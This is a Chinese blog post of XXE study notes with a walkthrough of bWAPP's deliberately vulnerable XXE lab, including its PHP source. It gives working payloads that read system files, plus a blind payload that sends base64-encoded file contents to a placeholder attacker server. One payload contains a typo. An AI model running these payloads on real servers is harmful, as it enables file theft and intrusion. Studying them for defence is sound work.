XXE学习


title: XXE学习
date: 2019-03-22 20:51:41
tags:
- XXE
categories:
- Web安全
- XXE


前言

本来是想了解一下SSRF的,结果找到讲bWapp的SSRF的博客,里面有一个关于XXE的SSRF,索性就先把XXE看一下。
参考链接:

  1. XXE前置知识
  2. bWapp之XXE

XXE和XML、DTD

先分别说一下这三个词的概念吧

XXE

XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,是对非安全的外部实体数据进行处理时引发的安全问题。要想搞懂XXE,肯定要先了解XML语法规则和外部实体的定义及调用形式。

DTD

DTD全称Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据类型有限,无法对元素或属性的内容进行详细规范,在可读性和可扩展性方面也比不上XML Schema。

XML

XML 指可扩展标记语言,被设计用来传输和存储数据。

学习链接

关于XML跟DTD的语法规则,我也是才看,还是不多说了,直接给教程链接吧。其中DTD的实体声明重点
XML教程
DTD教程


基本Payload结构

<?xml version="1.0" encoding="UTF-8"?>  //xml声明
<!DOCTYPE miracle [             //DTD部分
    <!ELEMENT miracle ANY >       //元素类型声明
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>                       //实体声明里的外部实体声明
<miracle>&xee;</miracle>       //XML部分

DTD实体声明

上述Payload分析

稍微对linux有点了解的,看到上面的Payload结构中的DTD部分外部实体声明即<!ENTITY xxe SYSTEM "file:///etc/passwd">这一句就应该猜到这个Payload的作用了吧。
没错,这个Payload的作用是输出目标服务器(服务器若为Linux)的passwd文件。
那如果想用XXE漏洞进行一些别的操作,如:内网探测、内网入侵该怎么办呢?
那就要讲到DTD实体声明了。

实体声明又分为内部实体声明、外部实体声明、参数实体声明等。这里就只讲外部实体声明、参数实体声明吧

DTD外部实体声明

DTD外部实体声明语法:<!ENTITY 实体名称 SYSTEM "URI/URL">
引用方式: &实体名

外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下图所示:


image

示例:

<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

DTD参数实体声明

语法:<!ENTITY % 实体名称 "实体的值"><!ENTITY % 实体名称 SYSTEM "URI">
引用方式:%实体名
示例:

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;]>
<foo>&evil;</foo>

外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >


XXE的利用方式-DTD

XXE作用

利用xxe漏洞可以进行拒绝服务攻击,文件读取,命令(代码)执行,SQL(XSS)注入,内外扫描端口,入侵内网站点等,内网探测和入侵是利用xxe中支持的协议http等进行内网主机和端口发现,可以理解是使用xxe进行SSRF的利用,基本上啥都能做了

XXE分类

一般xxe利用分为两大场景:有回显和无回显。有回显的情况可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为blind xxe,可以使用外带数据通道提取数据。

有回显情况

有回显的情况可以使用如下的两种方式进行XXE注入攻击,也就是上面讲到的DTD外部实体声明和参数实体声明。
方式一:

<!DOCTYPE foo 
[<!ELEMENT foo ANY >
<!ENTITY  xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<foo>&xxe;</foo>

方式二:

<!DOCTYPE foo 
[<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd" >
%xxe;
]>
<foo>&evil;</foo>

外部evil.dtd内容为:<!ENTITY evil SYSTEM "file:///c:/windows/win.ini" >

无回显情况

可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx

<!DOCTYPE updateProfile [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./target.php">
<!ENTITY % dtd SYSTEM "http://xxx.xxx.xxx/evil.dtd">
%dtd;
%send;
]>

evil.dtd的内容,内部的%号要进行实体编码成&#x25。
注意此处的参数实体声明语法格式是:<!ENTITY % 实体名称 "值">

<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://xxx.xxx.xxx/?data=%file;'>"
>
%all;

这里执行完查看结果分两种情况:

  1. 有报错
    有报错信息的话,直接查看错误信息有没有目标文件源码的base64
  2. 没有报错
    没有报错的话,查看被发送机(自己的主机且具有公网IP)的访问日志。

还有bWapp中的xxe利用,待更···


2019/03/27 更

bWapp里的XXE实验

0x01 进入bWapp,选择XXE漏洞环境

  1. 打开bWapp虚拟机,未安装参考BWAPP:一款非常好用的漏洞演示平台进行安装
  2. 使用账户:bee 密码:bug进行登录,并选择安全级别为low
  3. 登录后选择XXE漏洞环境,点击hack


    image
  4. 成功进入到XXE漏洞环境


    image

0x02 抓包分析

  1. 打开Burp,设置好浏览器代理,点击Any bugs?,查看抓包结果


    image
  2. 对抓包结果分析,如上图所划线处,可以看到xxe-1.php页面以POST方式向xxe-2.php提交xml数据

0x03 构造payloads

payload:

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE miracle [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<reset>
<login>&xxe;</login>
<secret>Any Bugs?</secret>
</reset>

0x04 使用Burp repeater提交payloads

image

0x05 源码分析

  1. 先放源码:
<?php

include("security.php");
include("security_level_check.php");
include("connect_i.php");

$message = "";
$body = file_get_contents("php://input");

// If the security level is not MEDIUM or HIGH
if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
{

    ini_set("display_errors",1);

    $xml = simplexml_load_string($body);

    // Debugging
    // print_r($xml);

    $login = $xml->login;
    $secret = $xml->secret;

    if($login && $login != "" && $secret)
    {

        // $login = mysqli_real_escape_string($link, $login);
        // $secret = mysqli_real_escape_string($link, $secret);
        
        $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";

        // Debugging
        // echo $sql;      

        $recordset = $link->query($sql);

        if(!$recordset)
        {

            die("Connect Error: " . $link->error);

        }

        $message = $login . "'s secret has been reset!";

    }

    else
    {

        $message = "An error occured!";

    }

}

// If the security level is MEDIUM or HIGH
else
{

    // Disables XML external entities. Doesn't work with older PHP versions!
    // libxml_disable_entity_loader(true);
    $xml = simplexml_load_string($body);
    
    // Debugging
    // print_r($xml);

    $login = $_SESSION["login"];
    $secret = $xml->secret;

    if($secret)
    {

        $secret = mysqli_real_escape_string($link, $secret);

        $sql = "UPDATE users SET secret = '" . $secret . "' WHERE login = '" . $login . "'";

        // Debugging
        // echo $sql;      

        $recordset = $link->query($sql);

        if(!$recordset)
        {

            die("Connect Error: " . $link->error);

        }

        $message = $login . "'s secret has been reset!";

    }

    else
    {

        $message = "An error occured!"; 

    }

}

echo $message;

$link->close();

?>
  1. 如下图,若安全级别为low的话,就从xml传输的数据中取出值来赋给login
image
  1. login再拼接成message


    image
  2. message直接输出,所以存在XXE漏洞,利用login进行我们想要的操作并回显


    image
  3. 在源码中也能看到,对于中高级别,login从Session中获取,secret从xml获取后也用 mysqli_real_escape_string函数进行了特殊字符转义。


总结

<p style="text-indent:27px">本来还想写一下jarvis oj上一个xxe的例子,后面想想还是留到后面写刷jarvis题目的时候在写吧。XXE就学到这里吧(更深的现在也找不到例子学不来,2333,以后再深入吧),过几天把SSRF简单学习总结一下。</p>

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,332评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,508评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,812评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,607评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,728评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,919评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,071评论 3 410
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,802评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,256评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,576评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,712评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,389评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,032评论 3 316
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,798评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,026评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,473评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,606评论 2 350

推荐阅读更多精彩内容